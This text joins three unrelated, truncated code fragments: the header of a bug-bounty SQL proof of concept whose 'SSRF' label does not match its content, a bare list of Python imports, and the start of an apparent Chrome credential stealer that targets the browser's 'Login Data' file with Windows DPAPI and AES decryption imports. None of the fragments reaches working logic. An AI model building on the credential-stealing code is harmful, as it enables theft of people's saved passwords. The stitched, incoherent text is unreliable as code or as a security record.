```sql
-- SSRF PoC: Arbitrary SQL Execution via Database Import
-- BugHunter Security Assessment - Authorized Bug Bounty Testing
-- Target: Yalla Super Mall (Sandbox) - Pantheon Bugcrowd Program
-- Tester: secfathy
-- Date: 2026-04-19
-- Marker table to prove SQL execution without destructive impact
CREATE TABLE IF NOT EXISTS ssrf_poc_evidence (
    id INT AUTO_INCREMENT PRIMARY KEY,
    marker VARCHAR(255),
```
```python
import warnings
from urllib3.exceptions import NotOpenSSLWarning
warnings.filterwarnings("ignore", category=NotOpenSSLWarning)
import subprocess
import requests
import urllib.parse
import json
import os
from datetime import datetime
```
```python
import os
import sqlite3
import json
import base64
import shutil
import win32crypt
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
CHROME_PATH = os.path.expanduser("~") + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
```